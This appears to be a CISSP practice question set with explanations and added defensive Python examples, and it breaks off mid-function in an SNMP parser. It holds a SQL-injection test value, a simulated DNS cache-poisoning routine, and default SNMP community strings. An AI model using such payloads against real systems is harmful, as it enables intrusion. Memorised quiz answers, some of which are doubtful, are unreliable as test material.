A. An open mail relay server is not an effective countermeasure against spam; in fact, spammers often use them to distribute spam, as they allow an attacker to mask their identity. An open mail relay is an SMTP server that is configured to allow inbound SMTP connections from anyone and to anyone on the Internet. This is how the Internet was originally set up, but many relays are now properly configured to prevent attackers from using them to distribute spam or pornography.
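The relay decision described above, as an added example that is not from the original page: the historic "accept from anyone, to anyone" behaviour beside the properly configured policy. The hosted domain, trusted network, IP addresses and sample sessions are constructed.

```python
"""Open mail relay versus a properly configured relay. Added example; the
hosted domain, trusted network, addresses and sample sessions are constructed."""
import ipaddress
from dataclasses import dataclass

LOCAL_DOMAINS = {"example.com"}                        # domains this MTA is the final destination for
TRUSTED_NETS  = [ipaddress.ip_network("10.0.0.0/8")]  # our own clients, allowed to relay outbound

@dataclass(frozen=True)
class Session:
    client_ip: str
    authenticated: bool   # SMTP AUTH succeeded
    mail_from: str
    rcpt_to: str

def domain_of(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower()

def open_relay(s: Session) -> bool:
    """The historic default: accept mail from anyone, to anyone."""
    return True

def configured_relay(s: Session) -> bool:
    """Accept inbound mail for domains we host from anyone; relay to foreign
    domains only for our own network or authenticated users; otherwise reject
    (an SMTP 554 'relay access denied')."""
    if domain_of(s.rcpt_to) in LOCAL_DOMAINS:
        return True
    client = ipaddress.ip_address(s.client_ip)
    if s.authenticated or any(client in net for net in TRUSTED_NETS):
        return True
    return False

# Constructed sessions: a spammer on the Internet, inbound mail for us,
# an internal client, and a roaming employee who authenticated.
SAMPLE_SESSIONS = [
    Session("203.0.113.9",  False, "offer@spam.example",    "victim@other.example"),
    Session("203.0.113.9",  False, "someone@other.example", "bob@example.com"),
    Session("10.1.2.3",     False, "bob@example.com",       "partner@other.example"),
    Session("198.51.100.7", True,  "alice@example.com",     "partner@other.example"),
]

def decisions(policy, sessions=SAMPLE_SESSIONS):
    return [policy(s) for s in sessions]
```

The first session is the one an open-relay test sends: an external sender, an external recipient. Postfix expresses the same ordering as `smtpd_relay_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination`.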

Which of the following access control mechanisms gives you the most granularity in defining access control policies? A. Attribute-based access control (ABAC) B. Role-based access control (RBAC) C. Mandatory access control (MAC) D. Discretionary access control (DAC)

A. Attribute-based access control (ABAC) is based on attributes of any component of the system. It is the most granular of the access control models.
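The two models compared above, and the turnover point made in the role-based answer earlier on this page, in working code. This is an added example, not from the original page; the roles, permissions, attributes, policy and users are constructed for illustration.

```python
"""Role-based versus attribute-based access control. Added example; the
roles, permissions, attributes and users are constructed for illustration."""
from dataclasses import dataclass

# ---- RBAC: permissions are attached to roles, users are plugged into roles ----
ROLE_PERMISSIONS = {
    "claims_adjuster": {"claim:read", "claim:update"},
    "auditor":         {"claim:read", "ledger:read"},
}

class Rbac:
    def __init__(self):
        self.user_roles = {}

    def hire(self, user, *roles):
        """Onboarding is one assignment; the role already carries the rights."""
        unknown = set(roles) - ROLE_PERMISSIONS.keys()
        if unknown:
            raise ValueError(f"unknown roles: {sorted(unknown)}")
        self.user_roles[user] = set(roles)

    def terminate(self, user):
        """Offboarding is one removal; no per-system permission cleanup."""
        self.user_roles.pop(user, None)

    def permitted(self, user, permission):
        return any(permission in ROLE_PERMISSIONS[r]
                   for r in self.user_roles.get(user, ()))

# ---- ABAC: the decision is a predicate over subject, resource and environment ----
@dataclass
class Request:
    subject: dict    # e.g. role, region, approval_limit
    resource: dict   # e.g. region, amount
    action: str
    env: dict        # e.g. hour of day

def abac_permitted(req: Request) -> bool:
    """Constructed policy: adjusters may update only claims in their own region,
    within their approval limit, during business hours; auditors only read."""
    s, r, e = req.subject, req.resource, req.env
    if req.action == "claim:read":
        return s.get("role") in ("claims_adjuster", "auditor")
    if req.action == "claim:update":
        return (s.get("role") == "claims_adjuster"
                and s.get("region") == r.get("region")
                and r.get("amount", 0) <= s.get("approval_limit", 0)
                and 8 <= e.get("hour", -1) < 18)
    return False   # default deny
```

Expressing "own region, under the approval limit, during business hours" in RBAC would need one role per combination of region and limit; ABAC states it once as a rule over attributes, which is the granularity the answer refers to.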

Which of the following terms refers to the number of bits of information that can be transmitted over a link within a second? A. Bandwidth. B. Throughput. C. Megabits per second (Mbps). D. Kilobits.

A. Bandwidth.

Which of the following is an advantage of using third-party auditors? A. They may have knowledge that an organization wouldn't otherwise be able to leverage. B. Their cost. C. The requirement for NDAs and supervision. D. Their use of automated scanners and reports.

A. Because they perform audits in multiple other organizations, and since their knowledge is constantly refreshed, third-party auditors almost always have knowledge and insights that would otherwise be unavailable to the organization.

A new software development company has been launched to create mobile device apps for different customers. The company has talented software programmers employed, but has not been able to implement standardized development processes that can be improved upon over time. Which of the following would be the best approach for this company to take in order to improve its software development processes? A. Capability Maturity Model Integration B. System development life cycle C. ISO/IEC 27002 D. Certification and accreditation processes

A. Capability Maturity Model Integration (CMMI) for development is a comprehensive integrated set of guidelines for developing products and software. It addresses the different phases of a software development life cycle, including concept definition, requirements analysis, design, development, integration, installation, operations, and maintenance and what should happen in each phase. The model describes procedures, principles, and practices that underlie software development process maturity. This model was developed to help software vendors improve their development processes by providing an evolutionary path from an ad hoc "fly by the seat of your pants" approach to a more disciplined and repeatable method that improves software quality, reduces the life cycle of development, provides better project management capabilities, allows for milestones to be created and met in a timely manner, and takes a more proactive approach than the less effective reactive approach.

What is the difference between configuration management and change management? A. Change management is a business process. Configuration management is an operational process. B. Change management is an operational process. Configuration management is a business process. C. There is no difference. Both terms refer to the same exact process. D. The difference is minimal, as they refer to different aspects of the same process.

A. Change management is a business process. Configuration management is an operational process.

Which of the following functions is the web server software currently carrying out, and what is an associated security concern Brad should address? A. Client-side validation. The web server should carry out a secondary set of input validation rules on the presented data before processing it. B. Server-side includes validation. The web server should carry out a secondary set of input validation rules on the presented data before processing it. C. Data Source Name logical naming access. The web server should be carrying out a second set of reference integrity rules. D. Data Source Name logical naming access. The web server should carry out a secondary set of input validation rules on the presented data before processing it.

A. Client-side validation is being carried out. This procedure ensures that the data that is inserted into the form contains valid values before being sent to the web server for processing. The web server should not just rely upon client-side validation, but should also carry out a second set of procedures to ensure that the input values are not illegal and potentially malicious.
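The "second set of procedures" the answer calls for, as an added example that is not from the original page: an allowlist revalidation run by the server on every request, regardless of what the browser script already checked. Python stands in for whatever stack Brad's web server runs; the field names, patterns and the tampered request are constructed.

```python
"""Server-side revalidation of form input. Added example; the field names,
rules and the tampered request are constructed for illustration."""
import re

# Allowlist: one pattern per expected field. Anything not matching is rejected,
# regardless of what the browser-side script already checked.
RULES = {
    "account_id": re.compile(r"[0-9]{6,10}"),
    "quantity":   re.compile(r"[1-9][0-9]{0,2}"),                        # 1..999
    "email":      re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
}

def validate_server_side(form: dict) -> list:
    """Return a list of problems; an empty list means the input may be
    processed. Missing and unexpected fields are errors too, because a client
    that skipped validation can also add or drop parameters."""
    errors = []
    for field in sorted(RULES.keys() - form.keys()):
        errors.append(f"missing field: {field}")
    for field in sorted(form.keys() - RULES.keys()):
        errors.append(f"unexpected field: {field}")
    for field, pattern in RULES.items():
        value = form.get(field)
        if value is not None and pattern.fullmatch(value) is None:
            errors.append(f"invalid value for {field}")
    return errors

# Constructed requests: what the browser form sends after passing the
# client-side script, and what an attacker sends after bypassing it entirely.
CLEAN_REQUEST = {"account_id": "12345678", "quantity": "3", "email": "bob@example.com"}
TAMPERED_REQUEST = {"account_id": "1' OR '1'='1", "quantity": "-5",
                    "email": "bob@example.com", "is_admin": "true"}
```

Client-side validation is still worth keeping for usability; it just carries no security weight, because the request can be crafted without the browser ever running it.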

Which of the following classification levels are most commonly used in military environments? A. Confidential, Secret, Top Secret. B. Unclassified, sensitive but unclassified. C. Private, Proprietary, Sensitive. D. Unrestricted, for government use only.

A. Confidential, Secret, Top Secret.

Which is not a primary goal of QoS? A. Content-based filtering is achieved. B. Jitter and latency are managed. C. Dedicated bandwidth is maintained. D. Different traffic types can coexist (voice, video, data).

A. Content-based filtering is achieved.

Which of the following is not true about continuous monitoring? A. It involves ad hoc processes that provide agility in responding to novel attacks. B. Its main goal is to support organizational risk management. C. It helps determine whether security controls remain effective. D. It relies on carefully chosen metrics and measurements.

A. Continuous monitoring is a deliberate, data-driven process supporting organizational risk management. One of the key questions it answers is: are controls still effective at mitigating risks? Continuous monitoring could potentially lead to a decision to implement specific ad hoc processes, but these would not really be part of continuous monitoring.

Use the following scenario to answer the question. Tom is a new security manager who is responsible for reviewing the current software that the company has developed internally. He finds that some of the software is outdated, which causes performance and functionality issues. During his testing procedures he sees that when one program stops functioning, it negatively affects other programs on the same system. He also finds out that as systems run over a period of a month, they start to perform more slowly, but by rebooting the systems this issue goes away. Which of the following best describes a characteristic of the software that may be causing issues? A. Cooperative multitasking B. Preemptive multitasking C. Maskable interrupt use D. Nonmaskable interrupt use

A. Cooperative multitasking means that a developer of an application has to properly code his software to release system resources when the application is finished using them, or the other software running on the system could be negatively affected. In this type of situation an application could be poorly coded and not release system resources, which would negatively affect other software running on the system. In a preemptive multitasking environment, the operating system would have more control of system resource allocation and provide more protection for these types of situations.

Which of the following would you use to control the public distribution, reproduction, display, and adaptation of an original white paper written by your staff? A. Copyright B. Trademark C. Patent D. Trade secret

A. Copyright

A government contracting firm uses classification levels within its data networking environment. Which of the following best describes why this data classification program is put into place? A. Cost reduction mechanism. B. Regulatory noncompliance C. Fraud detection. D. Collusion activation.

A. Cost reduction mechanism.

What is the goal of cryptanalysis? A. To determine the strength of an algorithm B. To increase the substitution functions in a cryptographic algorithm C. To decrease the transposition functions in a cryptographic algorithm D. To determine the permutations used

A. Cryptanalysis is the process of trying to reverse-engineer a cryptosystem, with the possible goal of uncovering the key used. Once this key is uncovered, all other messages encrypted with this key can be accessed. Cryptanalysis is carried out by the white hats to test the strength of the algorithm.

DES performs how many rounds of transposition/permutation and substitution? A. 16 B. 32 C. 64 D. 56

A. DES carries out 16 rounds of mathematical computation on each 64-bit block of data it is responsible for encrypting. A round is a set of mathematical formulas used for encryption and decryption processes.

How many bits make up the effective length of the DES key? A. 56 B. 64 C. 32 D. 16

A. DES has a key size of 64 bits, but 8 bits are used for parity, so the true key size is 56 bits. Remember that DEA is the algorithm used for the DES standard, so DEA also has a true key size of 56 bits, because we are actually talking about the same algorithm here. DES is really the standard, and DEA is the algorithm.
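The 64-versus-56-bit point above, worked through on an actual key: each key byte carries seven key bits and one parity bit, and toggling a parity bit changes the 64-bit string without changing the key DES actually uses. This is an added example, not from the original page; the sample key is constructed.

```python
"""DES key length: 64 bits supplied, 8 of them parity, 56 effective. Added
example; the sample key used in the usage note is constructed."""

def has_odd_parity(key: bytes) -> bool:
    """DES/DEA requires every key byte to have odd parity: the least
    significant bit of each byte is set so the byte has an odd number of 1s."""
    if len(key) != 8:
        raise ValueError("DES key must be exactly 8 bytes")
    return all(bin(b).count("1") % 2 == 1 for b in key)

def set_odd_parity(key: bytes) -> bytes:
    """Recompute each byte's parity bit; the 56 key bits are untouched."""
    if len(key) != 8:
        raise ValueError("DES key must be exactly 8 bytes")
    fixed = bytearray()
    for b in key:
        high7 = b & 0xFE
        fixed.append(high7 | (0 if bin(high7).count("1") % 2 else 1))
    return bytes(fixed)

def effective_key(key: bytes) -> int:
    """Drop the parity bit of each byte and pack the 56 remaining bits into an
    integer. These are the same bits the key schedule's PC-1 step keeps (PC-1
    also permutes them, which is omitted here)."""
    value = 0
    for b in key:
        value = (value << 7) | (b >> 1)
    return value

def flip_parity_bit(key: bytes, index: int) -> bytes:
    """Toggle one parity bit: a different 64-bit string, the same DES key."""
    k = bytearray(key)
    k[index] ^= 0x01
    return bytes(k)
```

With the constructed key `0123456789abcdef` (every byte already has odd parity), flipping bit 0 of the first byte fails the parity check, `set_odd_parity` restores the original, and `effective_key` is identical for both, which is why a brute-force search of DES covers 2^56 keys rather than 2^64.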

Which of the following protocols blurs the lines between the OSI model layers, performing the tasks of several at once? A. Distributed Network Protocol 3 (DNP3) B. File Transfer Protocol (FTP) C. Transmission Control Protocol (TCP) D. Domain Name System (DNS)

A. DNP3 was designed for use in SCADA systems, which were historically configured in a flat network hierarchy, with devices serially connected to each other. As such, modern routing functionality was not required. Consequently, it behaves much like a serial link layer protocol, but also performs the function of a transport layer protocol as well.

DNS is a popular target for attackers due to its strategic role on the Internet. What type of attack uses recursive queries to poison the cache of a DNS server? A. DNS hijacking B. Manipulation of the hosts file C. Social engineering D. Domain litigation

A. DNS plays a strategic role in the transmission of traffic on the Internet. The DNS directs traffic to the appropriate address by mapping domain names to their corresponding IP addresses. DNS queries can be classified as either recursive or iterative. In a recursive query the DNS server often forwards the query to another server and returns the proper response to the inquirer. In an iterative query, the DNS server responds with an address for another DNS server that might be able to answer the question, and the client then proceeds to ask the new DNS server. Attackers use recursive queries to poison the cache of a DNS server. In this manner, attackers can point systems to a website that they control and that contains malware or some other form of attack. Here's how it works: An attacker sends a recursive query to a victim DNS server asking for the IP address of the domain www.logicalsecurity.com. The DNS server forwards the query to another DNS server. However, before the other DNS server responds, the attacker injects his own IP address. The victim server accepts the IP address and stores it in its cache for a specific period of time. The next time a system queries the server to resolve www.logicalsecurity.com to its IP address, the server will direct users to the attacker's IP address. This is called DNS spoofing or DNS poisoning.

Which of the following is the best countermeasure for the attack type addressed in the scenario? A. DNSSEC B. IPSec C. Split server configurations D. Disabling zone transfers

A. DNSSEC protects DNS servers from forged DNS information, which is commonly used to carry out DNS cache poisoning attacks. If DNSSEC is implemented, then all responses that the server receives will be verified through digital signatures. This helps ensure that an attacker cannot provide a DNS server with incorrect information, which would point the victim to a malicious website.
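The poisoning sequence from the previous answer and the countermeasure from this one, modelled in code. This is an added example, not from the original page. Two defences are shown: matching each reply against the outstanding query's transaction ID and source port (the pre-DNSSEC mitigation, included for contrast), and validating a signature on the answer. The signature check stands in for DNSSEC RRSIG validation using an HMAC under a shared key rather than a public-key signature; the zone key and IP addresses are constructed.

```python
"""Recursive-query cache poisoning and two defences. The HMAC signature is a
stand-in for DNSSEC's public-key RRSIGs. Added example; the zone key and
addresses are constructed."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass

ZONE_KEY = b"constructed-zone-key"   # stand-in for the zone's DNSSEC signing key

def sign_rr(name: str, address: str) -> bytes:
    """Signature over the answer record, as the authoritative zone would attach."""
    return hmac.new(ZONE_KEY, f"{name}={address}".encode(), hashlib.sha256).digest()

@dataclass(frozen=True)
class Reply:
    txid: int
    port: int       # destination port, i.e. the resolver's query source port
    name: str
    address: str
    sig: bytes = b""

class Resolver:
    def __init__(self, match_query: bool = True, validate: bool = True):
        self.cache = {}
        self.pending = {}      # name -> (txid, source port) of the outstanding query
        self.match_query = match_query
        self.validate = validate

    def send_query(self, name: str):
        """Recursive lookup on behalf of a client: forward upstream with a
        random 16-bit transaction ID and a random source port."""
        txid = secrets.randbelow(1 << 16)
        port = 1024 + secrets.randbelow(65536 - 1024)
        self.pending[name] = (txid, port)
        return txid, port

    def receive(self, reply: Reply) -> bool:
        """Return True if the reply was accepted into the cache."""
        if reply.name not in self.pending:
            return False                                  # unsolicited
        if self.match_query and (reply.txid, reply.port) != self.pending[reply.name]:
            return False                                  # does not match our query
        if self.validate and not hmac.compare_digest(
                reply.sig, sign_rr(reply.name, reply.address)):
            return False                                  # fails validation
        del self.pending[reply.name]
        self.cache[reply.name] = reply.address
        return True

    def resolve(self, name: str):
        return self.cache.get(name)

ATTACKER_IP = "203.0.113.66"    # constructed
GENUINE_IP  = "198.51.100.10"   # constructed

def poison(resolver: Resolver, name: str, attacker_knows_query: bool = False) -> bool:
    """Trigger a recursive lookup, then inject a reply before the real server
    answers. The attacker cannot produce a valid signature."""
    txid, port = resolver.send_query(name)
    if not attacker_knows_query:                      # normal case: must guess both
        txid = secrets.randbelow(1 << 16)
        port = 1024 + secrets.randbelow(65536 - 1024)
    return resolver.receive(Reply(txid, port, name, ATTACKER_IP))

def genuine_lookup(resolver: Resolver, name: str) -> bool:
    txid, port = resolver.send_query(name)
    return resolver.receive(Reply(txid, port, name, GENUINE_IP, sign_rr(name, GENUINE_IP)))
```

Against the naive resolver the forged reply lands on the first try. Query matching forces the attacker to guess a transaction ID and port, which raises the cost but does not remove the attack; a correctly guessed (or leaked) pair is accepted. Only the validating resolver rejects a forged answer even when the attacker knows the query, which is the property the answer above attributes to DNSSEC.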

Which of the following lists the OSI layers 2, 5, 7, 4 and 3, in that order? A. Data link, session, application, transport, and network. B. Data link, transport, application, session, and network. C. Network, session, application, network, and transport. D. Network, transport, application, session, and presentation.

A. Data link, session, application, transport, and network.

Which entity provides formal authorization on access decisions? A. Data owner B. Data custodian C. Data user D. Data warehouse.

A. Data owner.

Which of the following best describes a technical control for dealing with the risks presented by data remanence? A. Encryption B. Data retention policies C. File deletion D. Using solid-state drives (SSD)

A. Data remanence refers to the persistence of data on storage media after it has been deleted. Encrypting this data is the best of the listed choices because the recoverable data will be meaningless to an adversary. Retention policies are important, but are considered administrative controls that don't deal with remanence directly. Simply deleting the file will not normally render the data unrecoverable, nor will the use of SSDs even though these devices will sometimes (though not always) make it difficult to recover the deleted data.

A high-level programming language: A. Decreases the total amount of code written. B. Allows programmers to define syntax. C. Requires programmer-controlled storage management. D. Enforces coding standards.

A. Decreases the total amount of code written.

Which of the following is a program counter that points to the memory location which holds the next instruction to be carried out? A. Dedicated register. B. Status register. C. TOC/TOU D. Privileged program.

A. Dedicated register.

An attack that sends packets with the same source and destination addresses would be considered what type of attack? A. Denial-of-service attack. B. Asynchronous attack. C. Distributed attack. D. Timing attack.

A. Denial-of-service attack.

Which of the following best describes the term DevOps? A. The practice of incorporating development, IT, and quality assurance (QA) staff into software development projects. B. A multidisciplinary development team with representatives from many or all the stakeholder populations. C. The operationalization of software development activities to support just-in-time delivery. D. A software development methodology that relies more on the use of operational prototypes than on extensive upfront planning.

A. DevOps is a type of integrated product team (IPT) that focuses on three communities: software development, IT operations, and quality assurance. The idea is to reduce the friction that oftentimes exists between the developers and IT staff in order to improve quality and velocity.

There are several different types of centralized access control protocols. Which of the following is illustrated in the graphic that follows? A. Diameter B. Watchdog C. RADIUS D. TACACS+

A. Diameter is an authentication, authorization, and auditing (AAA) protocol that provides the same type of functionality as RADIUS and TACACS+ but also provides more flexibility and capabilities to meet the new demands of today's complex and diverse networks. At one time, all remote communication took place over Point-to-Point Protocol (PPP) and Serial Line Internet Protocol (SLIP) connections, and users authenticated themselves through Password Authentication Protocol (PAP) or Challenge Handshake Authentication Protocol (CHAP). Technology has become much more complicated and there are more devices and protocols to choose from than ever before. The Diameter protocol allows wireless devices, smartphones, and other devices to be able to authenticate themselves to networks using roaming protocols, Mobile IP, Ethernet over PPP, Voice over IP (VoIP), and others.

Which of the following correctly describes direct access and sequential access storage devices? A. Any point on a direct access storage device may be promptly reached, whereas every point in between the current position and the desired position of a sequential access storage device must be traversed in order to reach the desired position. B. RAIT is an example of a direct access storage device, while RAID is an example of a sequential access storage device. C. MAID is a direct access storage device, while RAID is an example of a sequential access storage device. D. As an example of sequential access storage, tape drives are faster than direct access storage devices.

A. Direct access storage device (DASD) is a general term for magnetic disk storage devices, which historically have been used in mainframe and minicomputer (mid-range computer) environments. A redundant array of independent disks (RAID) is a type of DASD. The key distinction between DASDs and sequential access storage devices (SASDs) is that any point on a DASD may be promptly reached, whereas every point in between the current position and the desired position of an SASD must be traversed in order to reach the desired position. Tape drives are SASDs. Tape storage is the lowest-cost option for very large amounts of data but is very slow compared to disk storage.

Which of the following would not require updated documentation? A. An antivirus signature update B. Reconfiguration of a server C. A change in security policy D. The installation of a patch to a production server

A. Documentation is a very important part of the change control process. If things are not properly documented, employees will forget what actually took place with each device. If the environment needs to be rebuilt, for example, it may be done incorrectly if the procedure was poorly or improperly documented. When new changes need to be implemented, the current infrastructure may not be totally understood. Continually documenting when virus signatures are updated would be overkill. The other answers contain events that certainly require documentation.

Which of the following statements is true about employee duress? A. Its risks can be mitigated by installing panic buttons. B. Its risks can be mitigated by installing panic rooms. C. Its risks can be mitigated by enforcing forced vacations. D. It can more easily be detected using the right clipping levels.

A. Duress is the use of threats or violence against someone in order to force them to do something they don't want to do. A popular example of a countermeasure for duress is the use of panic buttons by bank tellers. A panic room could conceivably be another solution, but it would only work if employees are able to get in and lock the door before an assailant can stop them, which makes it a generally poor approach. Forced vacations and clipping levels address different problems (detecting fraud by a single employee and detecting repeated failed logons, respectively), not duress.

A CISSP candidate signs an ethics statement prior to taking the CISSP examination. Which of the following would be a violation of the (ISC)2 Code of Ethics that could cause the candidate to lose his or her certification? A. E-mailing information or comments about the exam to other CISSP candidates B. Submitting comments on the questions of the exam to (ISC)2 C. Submitting comments to the board of directors regarding the test and content of the class D. Conducting a presentation about the CISSP certification and what the certification means

A. E-mailing information or comments about the exam to other CISSP candidates

Operating systems may not work on systems with specific processors. Which of the following best describes why one operating system may work on an Intel processor but not on an AMD processor? A. The operating system was not developed to work within the architecture of a specific processor and cannot use that specific processor instruction set. B. The operating system was developed before the new processor architecture was released, and thus is not backward compatible. C. The operating system is programmed to use a different instruction set. D. The operating system is platform dependent, and thus can work only on one specific processor family.

A. Each CPU type has a specific architecture and set of instructions that it can carry out. The operating system must be designed to work within this CPU architecture. This is why one operating system may work on an Intel processor but not on an AMD processor.

Which of the following has an incorrect definition mapping? i.Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) Team-oriented approach that assesses organizational and IT risks through facilitated workshops ii.ISACA Risk IT Aims to bridge the gap between generic frameworks and IT-centric ones iii.ISO/IEC 27005 International standard for the implementation of a risk management program that integrates into an information security management system (ISMS) iv.Failure Modes and Effect Analysis (FMEA) Approach that dissects a component into its basic functions to identify flaws and those flaws' effects v. Fault tree analysis Approach to map specific flaws to root causes in complex systems A. None of them B. ii C. iii, iv D. v

A. Each answer lists the correct definition mapping.

There are several types of redundant technologies that can be put into place. What type of technology is shown in the graphic that follows? A. Tape vaulting B. Remote journaling C. Electronic vaulting D. Redundant site

A. Each site should have a full set of the most current and updated information and files, and a commonly used software backup technology is referred to as tape vaulting. Many businesses back up their data to tapes that are then manually transferred to an offsite facility by a courier or an employee. With automatic tape vaulting, the data is sent over a serial line to a backup tape system at the offsite facility. The company that maintains the offsite facility maintains the systems and changes out tapes when necessary. Data can be quickly backed up and retrieved when necessary. This technology reduces the manual steps in the traditional tape backup procedures. Basic vaulting of tape data involves sending backup tapes to an offsite location, but a manual process can be error prone. Electronic tape vaulting transmits data over a network to tape devices located at an alternate data center. Electronic tape vaulting improves recovery speed and reduces errors, and backups can be run more frequently.

Security awareness training programs have all of the following characteristics, except: A. Enforced by department heads. B. Simple, clear, and concise C. ongoing D. Entertaining and positive

A. Enforced by department heads.

Which of the following best describes a continuity of operations plan? A. Establishes senior management and a headquarters after a disaster. Outlines roles and authorities, orders of succession, and individual role tasks. B. Plan for systems, networks, and major applications recovery procedures after disruptions. A contingency plan should be developed for each major system and application. C. Includes internal and external communication structure and roles. Identifies specific individuals who will communicate with external entities. Contains predeveloped statements that are to be released. D. Focuses on malware, hackers, intrusions, attacks, and other security issues. Outlines procedures for incident response.

A. Establishes senior management and a headquarters after a disaster. Outlines roles and authorities, orders of succession, and individual role tasks.

Which of the following statements describes a "converged" protocol? A. It is a term used to describe a situation where two otherwise independent protocols—often functioning at the same layer—become one, as with Fibre Channel (FC) over Ethernet (FCoE). B. It is any situation where one protocol is encapsulated with another, as with TCP inside of IP (TCP/IP). C. It refers to when two protocols at the same layer begin to do essentially the same thing, such as HTTP and HTTPS. D. It is any situation where a protocol is encapsulated within another protocol in a way that bends or breaks the OSI model, as IPv6 over generic routing encapsulation (GRE) over IPv4.

A. FCoE, in allowing older Fibre Channel frames to ride over Ethernet frames, is an example of a converged protocol, as they are otherwise both data link protocols.

Device backup and other availability solutions are chosen to balance the value of having information available against the cost of keeping that information available. Which of the following best describes fault-tolerant technologies? A. They are among the most expensive solutions and are usually only for the most mission-critical information. B. They help service providers identify appropriate availability services for a specific customer. C. They are required to maintain integrity, regardless of the other technologies in place. D. They allow a failed component to be replaced while the system continues to run.

A. Fault-tolerant technologies keep information available not only against individual storage device faults, but even against whole system failures. Fault tolerance is among the most expensive possible solutions for availability and is commonly justified only for the most mission-critical information. All technology will eventually experience a failure of some form. A company that would suffer irreparable harm from any unplanned downtime can justify paying the high cost for fault-tolerant systems.

Which of the following is the best solution to meet the company's need for broadband wireless connectivity? A. WiMAX B. IEEE 802.12 C. WPA2 D. IEEE 802.15

A. IEEE 802.16 is a MAN wireless standard that allows for wireless traffic to cover a wide geographical area. This technology is also referred to as broadband wireless access. The commercial name for 802.16 is WiMAX.

ISO/IEC 27031:2011 is an international standard for business continuity that organizations can follow. Which of the following is a correct characteristic of this standard? A. Guidelines for information and communications technology readiness for business continuity B. ISO/IEC standard that is a component of the overall BS 7999 series C. Standard that was developed by NIST and evolved to be an international standard D. Developed primarily for the financial sector

A. ISO/IEC 27031:2011 is a set of guidelines for information and communications technology readiness for business continuity. This ISO/IEC standard is a component of the overall ISO/IEC 27000 series.

Pete is a new security manager at a financial institution that develops its own internal software for specific proprietary functionality. The financial institution has several locations distributed throughout the world and has bought several individual companies over the last ten years, each with its own heterogeneous environment. Since each purchased company had its own unique environment, it has been difficult to develop and deploy internally developed software in an effective manner that meets all the necessary business unit requirements. Which of the following best describes a standard that Pete should ensure the software development team starts to implement so that various business needs can be met? A. ISO/IEC/IEEE 42010 B. Common Criteria C. ISO/IEC 43010 D. ISO/IEC 15408

A. ISO/IEC/IEEE 42010 is an international standard that specifies how system architecture frameworks and architecture description languages are defined. It allows systems to be developed in a manner that addresses all of the stakeholders' concerns, which is what Pete needs in order to build software that fits many heterogeneous environments.

The discovery of electronically stored information (ESI), or e-discovery, can be defined as a process for producing admissible evidence for court proceedings. The electronic discovery reference model (EDRM) defines which of the following series of steps for e-discovery? A. Identification, Preservation, Collection, Processing, Review, Analysis, Production, and Presentation. B. Identification, Analysis. Collection, and Documentation. C. Collection, Identification, Manipulation, Analysis, Review, and Presentation. D. Collection, Processing, Analysis, Compilation, Distribution, and Recovery.

A. Identification, Preservation, Collection, Processing, Review, Analysis, Production, and Presentation.

Bob has noticed that one of the network switches has been acting strangely over the last week. Bob installed a network protocol analyzer to monitor the traffic going to the specific switch. He has identified UDP traffic coming from an outside source using the destination port 161. Which of the following best describes what is most likely taking place? A. An attacker is modifying the switch SNMP MIB. B. An attacker is carrying out a selective DoS attack. C. An attacker is manipulating the ARP cache. D. An attacker is carrying out an injection attack.

A. If an attacker can uncover the read-write string, she could change values held within the MIB, which could reconfigure the device. The usual default read-only community string is "public" and the read-write string is "private." Many companies do not change these, so anyone who can connect to port 161 can read the status information of a device and potentially reconfigure it. SNMPv1 and SNMPv2c send the community string in cleartext in every message, so anyone who can sniff or reach the agent can learn it; SNMPv3 adds per-user authentication and encryption and should be used where SNMP is needed at all. The SNMP ports (161 and 162) should not be open to untrusted networks, like the Internet, and if needed they should be filtered to ensure only authorized individuals can connect to them.
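
The following is an added example for this flashcard, not code from the original page. It shows what Bob's protocol analyzer would have to do with one of those UDP/161 datagrams: decode the SNMPv1/v2c message (SEQUENCE { version INTEGER, community OCTET STRING, PDU }) far enough to recover the community string and the PDU type, then flag the three things that matter here: an untrusted source address, a default community string, and a SetRequest, which is the write operation that reconfigures a device. The packets are constructed with a small BER encoder rather than captured, and the trusted network ranges are an assumption.

```python
"""Triage of inbound UDP/161 traffic: pull the community string and PDU type
out of an SNMPv1/v2c message. Added example, not the page's own code.
Sample packets are constructed here, not captured; trusted ranges are assumed."""
import ipaddress

# BER tags used in SNMPv1/v2c messages
TAG_INTEGER, TAG_OCTET_STRING, TAG_NULL, TAG_OID, TAG_SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA5: "GetBulkRequest"}
DEFAULT_COMMUNITIES = {b"public", b"private"}   # the usual vendor defaults


def tlv(tag, payload):
    """Encode one BER tag-length-value triple (short- or long-form length)."""
    n = len(payload)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + payload


def encode_oid(dotted):
    """BER-encode a dotted OID such as 1.3.6.1.2.1.1.5.0 (sysName.0)."""
    arcs = [int(p) for p in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:                          # base-128 with continuation bits
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(TAG_OID, bytes(out))


def build_request(community, oid, pdu_tag=0xA0, request_id=1):
    """Construct an SNMPv2c (version field 1) request carrying a single varbind."""
    varbind = tlv(TAG_SEQUENCE, encode_oid(oid) + tlv(TAG_NULL, b""))
    pdu = tlv(pdu_tag, tlv(TAG_INTEGER, bytes([request_id]))   # request-id (assumed < 128)
              + tlv(TAG_INTEGER, b"\x00")                      # error-status
              + tlv(TAG_INTEGER, b"\x00")                      # error-index
              + tlv(TAG_SEQUENCE, varbind))                    # variable bindings
    return tlv(TAG_SEQUENCE, tlv(TAG_INTEGER, b"\x01") + tlv(TAG_OCTET_STRING, community) + pdu)


def read_tlv(buf, pos):
    """Decode the TLV starting at buf[pos]; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: the next bytes hold the length
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def parse_snmp(packet):
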